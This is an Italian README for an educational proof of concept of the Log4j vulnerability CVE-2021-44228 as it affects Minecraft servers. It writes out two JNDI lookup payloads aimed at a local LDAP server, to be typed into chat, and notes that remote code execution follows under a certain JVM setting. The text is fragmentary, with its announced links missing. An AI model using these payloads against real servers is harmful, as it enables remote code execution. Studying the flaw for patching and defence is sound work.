
Un Proof of Concept educativo per la vulnerabilità Log4j (CVE-2021-44228) in Minecraft
Questo progetto è solo a scopo educativo.
Questo è un proof of concept dell'RCE di log4j adattato da HyCraftHD.
Ecco alcuni link per la CVE-2021-44228:
Questo bug colpisce quasi tutte le versioni di log4j2 e forse log4j1. La versione consigliata da utilizzare è 2.15.0 che risolve l'exploit.
${jndi:ldap://127.0.0.1/e} nella chat. Se c'è un socket aperto sulla porta 389, log4j tenta di connettersi e blocca ulteriori comunicazioni fino a che non si verifica un timeout.THIS IS SEND TO THE LOG!!! LOG4J EXPLOIT! che è un oggetto stringa serializzato dal server ldap.
${jndi:ldap://127.0.0.1/exe} nella chat. Se -Dcom.sun.jndi.ldap.object.trustURLCodebase=true è impostato a true, l'esecuzione remota di codice avverrà.